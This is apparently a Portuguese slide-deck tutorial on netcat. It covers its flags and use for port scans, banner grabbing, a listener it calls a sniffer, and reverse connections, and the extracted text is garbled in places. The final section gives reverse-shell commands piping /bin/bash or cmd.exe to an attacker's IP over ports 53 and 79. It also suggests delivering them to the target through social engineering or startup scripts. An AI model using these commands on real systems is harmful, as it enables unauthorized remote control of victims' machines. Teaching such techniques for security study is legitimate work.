NETCAT

Luiz Eduardo Guarino de Vasconcelos

O que é?

� Canivete suíço � cheio de acessórios

� NetCat ou apenas nc, é o canivete suíço do TCP/IP

� Pode ser usado para trojan, port scan, brute force, etcetc

� Nada mal para quem surgiu como um Telnet melhorado

Para que serve?

� Diversas possibilidades

� O que impressiona é o tamanho do programa (muito pequeno) pelo seu potencial

� Nc permite manipular conexões TCP/IP para � Nc permite manipular conexões TCP/IP para alcançarmos alguns objetivos

Obtendo

� Instalado nas distribuições Linux mais conhecidas

� Pode obter com apt-get install netcat

� Digite nc ou netcat no console. Se aparecer Cmd line é que está instaladoline é que está instalado

� Existe a versão para Windows também

� Descompactar os arquivos em qualquer pasta

Funcionamento

� Semelhante as outras ferramentas de console (linha de comando)

� Digitar nome do programa, seguido dos parâmetros, do IP e talvez as portas desejadasparâmetros, do IP e talvez as portas desejadas

� Exemplo de varredura port scan de 1 a 100

� Duas formas

� nc –vv 192.168.0.1 1-100 (comando direto)

� nc� E depois os parâmetros no Cmd line

� –vv 192.168.0.1 1-100

Parâmetros

� Ajuda

� nc –h

� -l: coloca uma porta em estado de escuta (listen)

� -L: coloca porta em escuta mas reabre caso ela feche

� -p XX: define uma porta� -p XX: define uma porta

� -v ou –vv: ativa o echo (verbose)

� -u: usa UDP ao invés de TCP

� -t: conexão por Telnet

� -w XX: determina tempo máximo em segundos para aguardar resposta

� -e: redireciona arquivos

� -d: coloca o nc em modo furtivo, ou seja, oculto e carregado na memória

Na Prática

� Veremos alguns exemplos

� É importante que entenda e pratique

� Desta forma, poderá adaptar os exemplos as suas necessidadesnecessidades

NetCat como Telnet

� O que é?

� Telnet é um protocolo/programa que permite a ligação de um computador a outro

� Na prática, quer dizer acesso remoto a outro computador, esteja na rede local ou na INternet

� Telnet é conhecimento imprescindível, tanto para invasores como para profissionais de segurança

� Como fazer isso com o nc?

� Basta informar o endereço do host e a porta de conexão. Porta padrão do Telnet é 23.

� nc 192.168.0.1 23

NetCat como PortScan

� O que é?

� Port Scan é a técnica de buscar no host quais portas e serviços estão ativos

� Como fazer isso com o nc?� Como fazer isso com o nc?

� nc -vv 127.0.0.1 1-100

� nc -vv 127.0.0.1 23 21 80 110

NetCat como Sniffer

� O que é?

� Sniffer é a técnica de captura de pacotes da rede

� Imagine você enviando um e-mail num cybercafe e alguém na outra máquina recebendo a mensagem e a senha do seu provedor

� Como fazer isso com o nc?

� nc -vv -L 127.0.0.1 -p 80 > log.txt

� Para ver o resultado, abra o arquivo no bloco de notas ou usando vi ou type

NetCat como FingerPrint

� O que é?

� Fingerprint é impressão digital

� Uso do nc para saber qual o SO que está rodando num servidor web

� Como fazer isso com o nc?

� nc www.dominio.com.br 80

� Depois digite� get ./

� Receberá cabeçalho do alvo

Net Cat com Conexão Reversa

� O que é?

� A idéia é simples. Se não podemos nos conectar no alvo por causa de restrições de firewalls, então vamos fazer o usuário conectar a nós

� Sabemos que firewall é mais rigoroso com conexões de entrada. Então podemos usar as portas 53 e 79, pois são usadas em consultas DNS e finger.

� Como fazer isso com o nc?� Como fazer isso com o nc?

� Técnica que depende da colaboração do alvo, seja de forma ativa ou passiva. Trabalho de engenharia social. Uso de .bat, tarefas, inicializador, etc

� Na máquina do invasor, digitar

� nc -l -n -vv -p 53

� nc -l -n -vv -p 79

� Na máquina do alvo, ele deverá digitar

� Se alvo em Linux

� nc IP_Invasor 53 | /bin/bash | nc IP_invasor 79

� Se alvo em Windows

� nc IP_Invasor 53 | cmd.exe | nc IP_invasor 79

Prática

� Aplique as técnicas abordadas na sua cobaia